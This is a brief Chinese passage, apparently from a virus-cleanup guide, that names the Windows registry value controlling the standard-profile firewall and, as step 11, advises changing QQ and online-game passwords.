还有:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile
的EnableFirewall键。
11、修改QQ、网游等密码。
